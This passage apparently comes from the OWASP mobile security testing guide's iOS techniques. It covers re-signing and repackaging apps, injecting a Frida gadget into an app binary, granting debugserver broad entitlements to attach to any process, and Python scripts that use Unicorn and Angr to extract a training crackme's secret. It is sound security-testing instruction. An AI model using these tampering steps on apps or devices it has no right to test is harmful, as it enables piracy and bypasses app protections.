"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#automated-repackaging","title":"Automated Repackaging","text":"Objection automates the process of app repackaging. You can find exhaustive documentation on the official wiki pages.
Using objection's repackaging feature is sufficient for most of use cases. However, in some complex scenarios you might need more fine-grained control or a more customizable repackaging process. In that case, you can read a detailed explanation of the repackaging and resigning process in \"Manual Repackaging\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#manual-repackaging","title":"Manual Repackaging","text":"Thanks to Apple's confusing provisioning and code-signing system, re-signing an app is more challenging than you would expect. iOS won't run an app unless you get the provisioning profile and code signature header exactly right. This requires learning many concepts-certificate types, Bundle IDs, application IDs, team identifiers, and how Apple's build tools connect them. Getting the OS to run a binary that hasn't been built via the default method (Xcode) can be a daunting process.
We'll use optool, Apple's build tools, and some shell commands. Our method is inspired by Vincent Tan's Swizzler project. The NCC group has described an alternative repackaging method.
To reproduce the steps listed below, download UnCrackable App for iOS Level 1 from the OWASP Mobile Testing Guide repository. Our goal is to make the UnCrackable app load FridaGadget.dylib
during startup so we can instrument the app with Frida.
Please note that the following steps apply to macOS only, as Xcode is only available for macOS.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0079/#getting-a-developer-provisioning-profile-and-certificate","title":"Getting a Developer Provisioning Profile and Certificate","text":"The provisioning profile is a plist file signed by Apple, which adds your code-signing certificate to its list of accepted certificates on one or more devices. In other words, this represents Apple explicitly allowing your app to run for certain reasons, such as debugging on selected devices (development profile). The provisioning profile also includes the entitlements granted to your app. The certificate contains the private key you'll use to sign.
Depending on whether you're registered as an iOS developer, you can obtain a certificate and provisioning profile in one of the following ways:
With an iOS developer account:
If you've developed and deployed iOS apps with Xcode before, you already have your own code-signing certificate installed. Use the security
command (macOS only) to list your signing identities:
$ security find-identity -v\n 1) 61FA3547E0AF42A11E233F6A2B255E6B6AF262CE \"iPhone Distribution: Company Name Ltd.\"\n 2) 8004380F331DCA22CC1B47FB1A805890AE41C938 \"iPhone Developer: Bernhard M\u00fcller (RV852WND79)\"\n
Log into the Apple Developer portal to issue a new App ID, then issue and download the profile. An App ID is a two-part string: a Team ID supplied by Apple and a bundle ID search string that you can set to an arbitrary value, such as com.example.myapp
. Note that you can use a single App ID to re-sign multiple apps. Make sure you create a development profile and not a distribution profile so that you can debug the app.
In the examples below, I use my signing identity, which is associated with my company's development team. I created the App ID \"sg.vp.repackaged\" and the provisioning profile \"AwesomeRepackaging\" for these examples. I ended up with the file AwesomeRepackaging.mobileprovision
-replace this with your own filename in the shell commands below.
With a Regular Apple ID:
Apple will issue a free development provisioning profile even if you're not a paying developer. You can obtain the profile via Xcode and your regular Apple account: simply create an empty iOS project and extract embedded.mobileprovision
from the app container, which is in the Xcode subdirectory of your home directory: ~/Library/Developer/Xcode/DerivedData/<ProjectName>/Build/Products/Debug-iphoneos/<ProjectName>.app/
. The NCC blog post \"iOS instrumentation without jailbreak\" explains this process in great detail.
Once you've obtained the provisioning profile, you can check its contents with the security
command. You'll find the entitlements granted to the app in the profile, along with the allowed certificates and devices. You'll need these for code-signing, so extract them to a separate plist file as shown below. Have a look at the file contents to make sure everything is as expected.
$ security cms -D -i AwesomeRepackaging.mobileprovision > profile.plist\n$ /usr/libexec/PlistBuddy -x -c 'Print :Entitlements' profile.plist > entitlements.plist\n$ cat entitlements.plist\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>application-identifier</key>\n <string>LRUD9L355Y.sg.vantagepoint.repackage</string>\n <key>com.apple.developer.team-identifier</key>\n <string>LRUD9L355Y</string>\n <key>get-task-allow</key>\n <true/>\n <key>keychain-access-groups</key>\n <array>\n <string>LRUD9L355Y.*</string>\n </array>\n</dict>\n</plist>\n
Note the application identifier, which is a combination of the Team ID (LRUD9L355Y) and Bundle ID (sg.vantagepoint.repackage). This provisioning profile is only valid for the app that has this App ID. The get-task-allow
key is also important: when set to true
, other processes, such as the debugging server, are allowed to attach to the app (consequently, this would be set to false
in a distribution profile).
lsof
is a powerful command, and provides a plethora of information about a running process. It can provide a list of all open files, including a stream, a network file or a regular file. When invoking the lsof
command without any option it will list all open files belonging to all active processes on the system, while when invoking with the flags -c <process name>
or -p <pid>
, it returns the list of open files for the specified process. The man page shows various other options in detail.
Using lsof
for an iOS application running with PID 2828, list various open files as shown below.
iPhone:~ root# lsof -p 2828\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\niOweApp 2828 mobile cwd DIR 1,2 864 2 /\niOweApp 2828 mobile txt REG 1,3 206144 189774 /private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\niOweApp 2828 mobile txt REG 1,3 5492 213230 /private/var/mobile/Containers/Data/Application/5AB3E437-9E2D-4F04-BD2B-972F6055699E/tmp/com.apple.dyld/iOweApp-6346DC276FE6865055F1194368EC73CC72E4C5224537F7F23DF19314CF6FD8AA.closure\niOweApp 2828 mobile txt REG 1,3 30628 212198 /private/var/preferences/Logging/.plist-cache.vqXhr1EE\niOweApp 2828 mobile txt REG 1,2 50080 234433 /usr/lib/libobjc-trampolines.dylib\niOweApp 2828 mobile txt REG 1,2 344204 74185 /System/Library/Fonts/AppFonts/ChalkboardSE.ttc\niOweApp 2828 mobile txt REG 1,2 664848 234595 /usr/lib/dyld\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0081/","title":"Get Open Connections","text":"lsof
command when invoked with option -i
, it gives the list of open network ports for all active processes on the device. To get a list of open network ports for a specific process, the lsof -i -a -p <pid>
command can be used, where -a
(AND) option is used for filtering. Below a filtered output for PID 1 is shown.
iPhone:~ root# lsof -i -a -p 1\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\nlaunchd 1 root 27u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 28u IPv6 0x69c2ce210efdc023 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 29u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 30u IPv4 0x69c2ce210eeaef53 0t0 TCP *:ssh (LISTEN)\nlaunchd 1 root 31u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\nlaunchd 1 root 42u IPv4 0x69c2ce211253b90b 0t0 TCP 192.168.1.12:ssh->192.168.1.8:62684 (ESTABLISHED)\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/","title":"Get Loaded Native Libraries","text":""},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-objection","title":"Using Objection","text":"You can use the list_frameworks
command in objection to list all the application's bundles that represent Frameworks.
...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios bundles list_frameworks\nExecutable Bundle Version Path\n-------------- ----------------------------------------- --------- -------------------------------------------\nBolts org.cocoapods.Bolts 1.9.0 ...8/DVIA-v2.app/Frameworks/Bolts.framework\nRealmSwift org.cocoapods.RealmSwift 4.1.1 ...A-v2.app/Frameworks/RealmSwift.framework\n ...ystem/Library/Frameworks/IOKit.framework\n...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0082/#using-frida","title":"Using Frida","text":"In Frida REPL process related information can be obtained using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[iPhone::com.iOweApp]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x10008c000\",\n \"name\": \"iOweApp\",\n \"path\": \"/private/var/containers/Bundle/Application/F390A491-3524-40EA-B3F8-6C1FA105A23A/iOweApp.app/iOweApp\",\n \"size\": 49152\n },\n {\n \"base\": \"0x1a1c82000\",\n \"name\": \"Foundation\",\n \"path\": \"/System/Library/Frameworks/Foundation.framework/Foundation\",\n \"size\": 2859008\n },\n {\n \"base\": \"0x1a16f4000\",\n \"name\": \"libobjc.A.dylib\",\n \"path\": \"/usr/lib/libobjc.A.dylib\",\n \"size\": 200704\n },\n\n ...\n
Similarly, information related to various threads can be obtained.
Process.enumerateThreads()\n[\n {\n \"context\": {\n ...\n },\n \"id\": 1287,\n \"state\": \"waiting\"\n },\n\n ...\n
The Process
command exposes multiple functions which can be explored as per needs. Some useful functions are findModuleByAddress
, findModuleByName
and enumerateRanges
besides others.
On iOS, each application gets a sandboxed folder to store its data. As per the iOS security model, an application's sandboxed folder cannot be accessed by another application. Additionally, the users do not have direct access to the iOS filesystem, thus preventing browsing or extraction of data from the filesystem. In iOS < 8.3 there were applications available which can be used to browse the device's filesystem, such as iExplorer and iFunBox, but in the recent version of iOS (>8.3) the sandboxing rules are more stringent and these applications do not work anymore. As a result, if you need to access the filesystem it can only be accessed on a jailbroken device. As part of the jailbreaking process, the application sandbox protection is disabled and thus enabling an easy access to sandboxed folders.
The contents of an application's sandboxed folder has already been discussed in \"Accessing App Data Directories\" in the chapter iOS Basic Security Testing. This chapter gives an overview of the folder structure and which directories you should analyze.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/","title":"Debugging","text":"Coming from a Linux background you'd expect the ptrace
system call to be as powerful as you're used to but, for some reason, Apple decided to leave it incomplete. iOS debuggers such as LLDB use it for attaching, stepping or continuing the process but they cannot use it to read or write memory (all PT_READ_*
and PT_WRITE*
requests are missing). Instead, they have to obtain a so-called Mach task port (by calling task_for_pid
with the target process ID) and then use the Mach IPC interface API functions to perform actions such as suspending the target process and reading/writing register states (thread_get_state
/thread_set_state
) and virtual memory (mach_vm_read
/mach_vm_write
).
For more information you can refer to the LLVM project in GitHub which contains the source code for LLDB as well as Chapter 5 and 13 from \"Mac OS X and iOS Internals: To the Apple's Core\" [#levin] and Chapter 4 \"Tracing and Debugging\" from \"The Mac Hacker's Handbook\" [#miller].
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0084/#debugging-with-lldb","title":"Debugging with LLDB","text":"The default debugserver executable that Xcode installs can't be used to attach to arbitrary processes (it is usually used only for debugging self-developed apps deployed with Xcode). To enable debugging of third-party apps, the task_for_pid-allow
entitlement must be added to the debugserver executable so that the debugger process can call task_for_pid
to obtain the target Mach task port as seen before. An easy way to do this is to add the entitlement to the debugserver binary shipped with Xcode.
To obtain the executable, mount the following DMG image:
/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/DeviceSupport/<target-iOS-version>/DeveloperDiskImage.dmg\n
You'll find the debugserver executable in the /usr/bin/
directory on the mounted volume. Copy it to a temporary directory, then create a file called entitlements.plist
with the following content:
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/ PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n
Apply the entitlement with codesign:
codesign -s - --entitlements entitlements.plist -f debugserver\n
Copy the modified binary to any directory on the test device. The following examples use usbmuxd to forward a local port through USB.
iproxy 2222 22\nscp -P 2222 debugserver root@localhost:/tmp/\n
Note: On iOS 12 and higher, use the following procedure to sign the debugserver binary obtained from the XCode image.
1) Copy the debugserver binary to the device via scp, for example, in the /tmp folder.
2) Connect to the device via SSH and create the file, named entitlements.xml, with the following content:
```xml\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>platform-application</key>\n <true/>\n <key>com.apple.private.security.no-container</key>\n <true/>\n <key>com.apple.private.skip-library-validation</key>\n <true/>\n <key>com.apple.backboardd.debugapplications</key>\n <true/>\n <key>com.apple.backboardd.launchapplications</key>\n <true/>\n <key>com.apple.diagnosticd.diagnostic</key>\n <true/>\n <key>com.apple.frontboard.debugapplications</key>\n <true/>\n <key>com.apple.frontboard.launchapplications</key>\n <true/>\n <key>com.apple.security.network.client</key>\n <true/>\n <key>com.apple.security.network.server</key>\n <true/>\n <key>com.apple.springboard.debugapplications</key>\n <true/>\n <key>com.apple.system-task-ports</key>\n <true/>\n <key>get-task-allow</key>\n <true/>\n <key>run-unsigned-code</key>\n <true/>\n <key>task_for_pid-allow</key>\n <true/>\n</dict>\n</plist>\n```\n
3) Type the following command to sign the debugserver binary:
```bash\nldid -Sentitlements.xml debugserver\n```\n
4) Verify that the debugserver binary can be executed via the following command:
```bash\n./debugserver\n```\n
You can now attach debugserver to any process running on the device.
VP-iPhone-18:/tmp root# ./debugserver *:1234 -a 2670\ndebugserver-@(#)PROGRAM:debugserver PROJECT:debugserver-320.2.89\nfor armv7.\nAttaching to process 2670...\n
With the following command you can launch an application via debugserver running on the target device:
debugserver -x backboard *:1234 /Applications/MobileSMS.app/MobileSMS\n
Attach to an already running application:
debugserver *:1234 -a \"MobileSMS\"\n
You may connect now to the iOS device from your host computer:
(lldb) process connect connect://<ip-of-ios-device>:1234\n
Typing image list
gives a list of main executable and all dependent libraries.
In the previous section we learned about how to setup a debugging environment on an iOS device using LLDB. In this section we will use this information and learn how to debug a 3rd party release application. We will continue using the UnCrackable App for iOS Level 1 and solve it using a debugger.
In contrast to a debug build, the code compiled for a release build is optimized to achieve maximum performance and minimum binary build size. As a general best practice, most of the debug symbols are stripped for a release build, adding a layer of complexity when reverse engineering and debugging the binaries.
Due to the absence of the debug symbols, symbol names are missing from the backtrace outputs and setting breakpoints by simply using function names is not possible. Fortunately, debuggers also support setting breakpoints directly on memory addresses. Further in this section we will learn how to do so and eventually solve the crackme challenge.
Some groundwork is needed before setting a breakpoint using memory addresses. It requires determining two offsets:
iOS is a modern operating system with multiple techniques implemented to mitigate code execution attacks, one such technique being Address Space Randomization Layout (ASLR). On every new execution of an application, a random ASLR shift offset is generated, and various process' data structures are shifted by this offset.
The final breakpoint address to be used in the debugger is the sum of the above two addresses (Breakpoint offset + ASLR shift offset). This approach assumes that the image base address (discussed shortly) used by the disassembler and iOS is the same, which is true most of the time.
When a binary is opened in a disassembler like Ghidra, it loads a binary by emulating the respective operating system's loader. The address at which the binary is loaded is called image base address. All the code and symbols inside this binary can be addressed using a constant address offset from this image base address. In Ghidra, the image base address can be obtained by determining the address of the start of a Mach-O file. In this case, it is 0x100000000.
From our previous analysis of the UnCrackable App for iOS Level 1 in \"Manual (Reversed) Code Review\" section, the value of the hidden string is stored in a label with the hidden
flag set. In the disassembly, the text value of this label is stored in register X21
, stored via mov
from X0
, at offset 0x100004520. This is our breakpoint offset.
For the second address, we need to determine the ASLR shift offset for a given process. The ASLR offset can be determined by using the LLDB command image list -o -f
. The output is shown in the screenshot below.
In the output, the first column contains the sequence number of the image ([X]), the second column contains the randomly generated ASLR offset, while 3rd column contains the full path of the image and towards the end, content in the bracket shows the image base address after adding ASLR offset to the original image base address (0x100000000 + 0x70000 = 0x100070000). You will notice the image base address of 0x100000000 is same as in Ghidra. Now, to obtain the effective memory address for a code location we only need to add ASLR offset to the address identified in Ghidra. The effective address to set the breakpoint will be 0x100004520 + 0x70000 = 0x100074520. The breakpoint can be set using command b 0x100074520
.
In the above output, you may also notice that many of the paths listed as images do not point to the file system on the iOS device. Instead, they point to a certain location on the host computer on which LLDB is running. These images are system libraries for which debug symbols are available on the host computer to aid in application development and debugging (as part of the Xcode iOS SDK). Therefore, you may set breakpoints to these libraries directly by using function names.
After putting the breakpoint and running the app, the execution will be halted once the breakpoint is hit. Now you can access and explore the current state of the process. In this case, you know from the previous static analysis that the register X0
contains the hidden string, thus let's explore it. In LLDB you can print Objective-C objects using the po
(print object) command.
Voila, the crackme can be easily solved aided by static analysis and a debugger. There are plethora of features implemented in LLDB, including changing the value of the registers, changing values in the process memory and even automating tasks using Python scripts.
Officially Apple recommends use of LLDB for debugging purposes, but GDB can be also used on iOS. The techniques discussed above are applicable while debugging using GDB as well, provided the LLDB specific commands are changed to GDB commands.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0085/","title":"Execution Tracing","text":"Tracing involves recording the information about a program's execution. In contrast to Android, there are limited options available for tracing various aspects of an iOS app. In this section we will be heavily relying on tools such as Frida for performing tracing.
TODO: This needs to be improved as well
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0086/","title":"Method Tracing","text":"Intercepting Objective-C methods is a useful iOS security testing technique. For example, you may be interested in data storage operations or network requests. In the following example, we'll write a simple tracer for logging HTTP(S) requests made via iOS standard HTTP APIs. We'll also show you how to inject the tracer into the Safari web browser.
In the following examples, we'll assume that you are working on a jailbroken device. If that's not the case, you first need to follow the steps outlined in section Repackaging and Re-Signing to repackage the Safari app.
Frida comes with frida-trace
, a function tracing tool. frida-trace
accepts Objective-C methods via the -m
flag. You can pass it wildcards as well-given -[NSURL *]
, for example, frida-trace
will automatically install hooks on all NSURL
class selectors. We'll use this to get a rough idea about which library functions Safari calls when the user opens a URL.
Run Safari on the device and make sure the device is connected via USB. Then start frida-trace
as follows:
$ frida-trace -U -m \"-[NSURL *]\" Safari\nInstrumenting functions...\n-[NSURL isMusicStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isMusicStoreURL_.js\"\n-[NSURL isAppStoreURL]: Loaded handler at \"/Users/berndt/Desktop/__handlers__/__NSURL_isAppStoreURL_.js\"\n(...)\nStarted tracing 248 functions. Press Ctrl+C to stop.\n
Next, navigate to a new website in Safari. You should see traced function calls on the frida-trace
console. Note that the initWithURL:
method is called to initialize a new URL request object.
/* TID 0xc07 */\n 20313 ms -[NSURLRequest _initWithCFURLRequest:0x1043bca30 ]\n 20313 ms -[NSURLRequest URL]\n(...)\n 21324 ms -[NSURLRequest initWithURL:0x106388b00 ]\n 21324 ms | -[NSURLRequest initWithURL:0x106388b00 cachePolicy:0x0 timeoutInterval:0x106388b80\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0087/","title":"Native Code Tracing","text":"As discussed earlier in this chapter, iOS applications can also contain native code (C/C++ code) and it can be traced using the frida-trace
CLI as well. For example, you can trace calls to the open
function by running the following command:
frida-trace -U -i \"open\" sg.vp.UnCrackable1\n
The overall approach and further improvisation for tracing native code using Frida is similar to the one discussed in the Android \"Tracing\" section.
Unfortunately, there are no tools such as strace
or ftrace
available to trace syscalls or function calls of an iOS app. Only DTrace
exists, which is a very powerful and versatile tracing tool, but it's only available for MacOS and not for iOS.
Apple provides a simulator app within Xcode which provides a real iOS device looking user interface for iPhone, iPad or Apple Watch. It allows you to rapidly prototype and test debug builds of your applications during the development process, but actually it is not an emulator. Difference between a simulator and an emulator is previously discussed in \"Emulation-based Dynamic Analysis\" section.
While developing and debugging an application, the Xcode toolchain generates x86 code, which can be executed in the iOS simulator. However, for a release build, only ARM code is generated (incompatible with the iOS simulator). That's why applications downloaded from the Apple App Store cannot be used for any kind of application analysis on the iOS simulator.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#corellium","title":"Corellium","text":"Corellium is a commercial tool which offers virtual iOS devices running actual iOS firmware, being the only publicly available iOS emulator ever. Since it is a proprietary product, not much information is available about the implementation. Corellium has no community licenses available, therefore we won't go into much detail regarding its use.
Corellium allows you to launch multiple instances of a device (jailbroken or not) which are accessible as local devices (with a simple VPN configuration). It has the ability to take and restore snapshots of the device state, and also offers a convenient web-based shell to the device. Finally and most importantly, due to its \"emulator\" nature, you can execute applications downloaded from the Apple App Store, enabling any kind of application analysis as you know it from real iOS (jailbroken) devices.
Note that in order to install an IPA on Corellium devices it has to be unencrypted and signed with a valid Apple developer certificate. See more information here.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0088/#unicorn","title":"Unicorn","text":"Unicorn is a lightweight, multi-architecture CPU emulator framework based on QEMU and goes beyond it by adding useful features especially made for CPU emulation. Unicorn provides the basic infrastructure needed to execute processor instructions. In this section we will use Unicorn's Python bindings to solve the UnCrackable App for iOS Level 1 challenge.
To use Unicorn's full power, we would need to implement all the necessary infrastructure which generally is readily available from the operating system, e.g. binary loader, linker and other dependencies or use another higher level frameworks such as Qiling which leverages Unicorn to emulate CPU instructions, but understands the OS context. However, this is superfluous for this very localized challenge where only executing a small part of the binary will suffice.
While performing manual analysis in \"Reviewing Disassembled Native Code\" section, we determined that the function at address 0x1000080d4 is responsible for dynamically generating the secret string. As we're about to see, all the necessary code is pretty much self-contained in the binary, making this a perfect scenario to use a CPU emulator like Unicorn.
If we analyze that function and the subsequent function calls, we will observe that there is no hard dependency on any external library and neither it's performing any system calls. The only access external to the functions occurs for instance at address 0x1000080f4, where a value is being stored to address 0x10000dbf0, which maps to the __data
section.
Therefore, in order to correctly emulate this section of the code, apart from the __text
section (which contains the instructions) we also need to load the __data
section.
To solve the challenge using Unicorn we will perform the following steps:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).__text
and __data
section from the binary.__text
and __data
section.To extract the content of __text
and __data
section from the Mach-O binary we will use LIEF, which provides a convenient abstraction to manipulate multiple executable file formats. Before loading these sections to memory, we need to determine their base addresses, e.g. by using Ghidra, Radare2 or IDA Pro.
From the above table, we will use the base address 0x10000432c for __text
and 0x10000d3e8 for __data
section to load them at in the memory.
While allocating memory for Unicorn, the memory addresses should be 4k page aligned and also the allocated size should be a multiple of 1024.
The following script emulates the function at 0x1000080d4 and dumps the secret string:
import lief\nfrom unicorn import *\nfrom unicorn.arm64_const import *\n\n# --- Extract __text and __data section content from the binary ---\nbinary = lief.parse(\"uncrackable.arm64\")\ntext_section = binary.get_section(\"__text\")\ntext_content = text_section.content\n\ndata_section = binary.get_section(\"__data\")\ndata_content = data_section.content\n\n# --- Setup Unicorn for ARM64 execution ---\narch = \"arm64le\"\nemu = Uc(UC_ARCH_ARM64, UC_MODE_ARM)\n\n# --- Create Stack memory ---\naddr = 0x40000000\nsize = 1024*1024\nemu.mem_map(addr, size)\nemu.reg_write(UC_ARM64_REG_SP, addr + size - 1)\n\n# --- Load text section --\nbase_addr = 0x100000000\ntmp_len = 1024*1024\ntext_section_load_addr = 0x10000432c\nemu.mem_map(base_addr, tmp_len)\nemu.mem_write(text_section_load_addr, bytes(text_content))\n\n# --- Load data section ---\ndata_section_load_addr = 0x10000d3e8\nemu.mem_write(data_section_load_addr, bytes(data_content))\n\n# --- Hack for stack_chk_guard ---\n# without this will throw invalid memory read at 0x0\nemu.mem_map(0x0, 1024)\nemu.mem_write(0x0, b\"00\")\n\n\n# --- Execute from 0x1000080d4 to 0x100008154 ---\nemu.emu_start(0x1000080d4, 0x100008154)\nret_value = emu.reg_read(UC_ARM64_REG_X0)\n\n# --- Dump return value ---\nprint(emu.mem_read(ret_value, 11))\n
You may notice that there is an additional memory allocation at address 0x0, this is a simple hack around stack_chk_guard
check. Without this, there will be a invalid memory read error and binary cannot be executed. With this hack, the program will access the value at 0x0 and use it for the stack_chk_guard
check.
To summarize, using Unicorn do require some additional setup before executing the binary, but once done, this tool can help to provide deep insights into the binary. It provides the flexibility to execute the full binary or a limited part of it. Unicorn also exposes APIs to attach hooks to the execution. Using these hooks you can observe the state of the program at any point during the execution or even manipulate the register or variable values and forcefully explore other execution branches in a program. Another advantage when running a binary in Unicorn is that you don't need to worry about various checks like root/jailbreak detection or debugger detection etc.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/","title":"Symbolic Execution","text":"An introduction to binary analysis using binary analysis frameworks has already been discussed in the \"Dynamic Analysis\" section for Android. We recommend you to revisit this section and refresh the concepts on this subject.
For Android, we used Angr's symbolic execution engine to solve a challenge. In this section, we will firstly use Unicorn to solve the UnCrackable App for iOS Level 1 challenge and then we will revisit the Angr binary analysis framework to analyze the challenge but instead of symbolic execution we will use its concrete execution (or dynamic execution) features.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0089/#angr","title":"Angr","text":"Angr is a very versatile tool, providing multiple techniques to facilitate binary analysis, while supporting various file formats and hardware instructions sets.
The Mach-O backend in Angr is not well-supported, but it works perfectly fine for our case.
While manually analyzing the code in the Reviewing Disassembled Native Code\" section, we reached a point where performing further manual analysis was cumbersome. The function at offset 0x1000080d4
was identified as the final target which contains the secret string.
If we revisit that function, we can see that it involves multiple sub-function calls and interestingly none of these functions have any dependencies on other library calls or system calls. This is a perfect case to use Angr's concrete execution engine. Follow the steps below to solve this challenge:
lipo -thin arm64 <app_binary> -output uncrackable.arm64
(ARMv7 can be used as well).Project
by loading the above binary.callable
object by passing the address of the function to be executed. From the Angr documentation: \"A Callable is a representation of a function in the binary that can be interacted with like a native python function.\".callable
object to the concrete execution engine, which in this case is claripy.backends.concrete
.import angr\nimport claripy\n\ndef solve():\n\n # Load the binary by creating angr project.\n project = angr.Project('uncrackable.arm64')\n\n # Pass the address of the function to the callable\n func = project.factory.callable(0x1000080d4)\n\n # Get the return value of the function\n ptr_secret_string = claripy.backends.concrete.convert(func()).value\n print(\"Address of the pointer to the secret string: \" + hex(ptr_secret_string))\n\n # Extract the value from the pointer to the secret string\n secret_string = func.result_state.mem[ptr_secret_string].string.concrete\n print(f\"Secret String: {secret_string}\")\n\nsolve()\n
Above, Angr executed an ARM64 code in an execution environment provided by one of its concrete execution engines. The result is accessed from the memory as if the program is executed on a real device. This case is a good example where binary analysis frameworks enable us to perform a comprehensive analysis of a binary, even in the absence of specialized devices needed to run it.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/","title":"Patching","text":"IPA files are actually ZIP archives, so you can use any ZIP tool to unpack the archive.
unzip UnCrackable-Level1.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-installing-frida-gadget","title":"Patching Example: Installing Frida Gadget","text":"IF you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable_Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0090/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
If you want to use Frida on non-jailbroken devices you'll need to include FridaGadget.dylib
. Download it first:
curl -O https://build.frida.re/frida/ios/lib/FridaGadget.dylib\n
Copy FridaGadget.dylib
into the app directory and use optool to add a load command to the \"UnCrackable Level 1\" binary.
$ unzip UnCrackable-Level1.ipa\n$ cp FridaGadget.dylib Payload/UnCrackable\\ Level\\ 1.app/\n$ optool install -c load -p \"@executable_path/FridaGadget.dylib\" -t Payload/UnCrackable\\ Level\\ 1.app/UnCrackable\\ Level\\ 1\nFound FAT Header\nFound thin header...\nFound thin header...\nInserting a LC_LOAD_DYLIB command for architecture: arm\nSuccessfully inserted a LC_LOAD_DYLIB command for arm\nInserting a LC_LOAD_DYLIB command for architecture: arm64\nSuccessfully inserted a LC_LOAD_DYLIB command for arm64\nWriting executable to Payload/UnCrackable Level 1.app/UnCrackable Level 1...\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0091/#patching-example-making-an-app-debuggable","title":"Patching Example: Making an App Debuggable","text":"By default, an app available on the Apple App Store is not debuggable. In order to debug an iOS application, it must have the get-task-allow
entitlement enabled. This entitlement allows other processes (like a debugger) to attach to the app. Xcode is not adding the get-task-allow
entitlement in a distribution provisioning profile; it is only whitelisted and added in a development provisioning profile.
Thus, to debug an iOS application obtained from the App Store, it needs to be re-signed with a development provisioning profile with the get-task-allow
entitlement. How to re-sign an application is discussed in the next section.
Tampering an app invalidates the main executable's code signature, so this won't run on a non-jailbroken device. You'll need to replace the provisioning profile and sign both the main executable and the files you've made include (e.g. FridaGadget.dylib
) with the certificate listed in the profile.
First, let's add our own provisioning profile to the package:
cp AwesomeRepackaging.mobileprovision Payload/UnCrackable\\ Level\\ 1.app/embedded.mobileprovision\n
Next, we need to make sure that the Bundle ID in Info.plist
matches the one specified in the profile because the codesign tool will read the Bundle ID from Info.plist
during signing; the wrong value will lead to an invalid signature.
/usr/libexec/PlistBuddy -c \"Set :CFBundleIdentifier sg.vantagepoint.repackage\" Payload/UnCrackable\\ Level\\ 1.app/Info.plist\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0092/#re-signing","title":"Re-Signing","text":"Finally, we use the codesign tool to re-sign both binaries. You need to use your own signing identity (in this example 8004380F331DCA22CC1B47FB1A805890AE41C938), which you can output by executing the command security find-identity -v
.
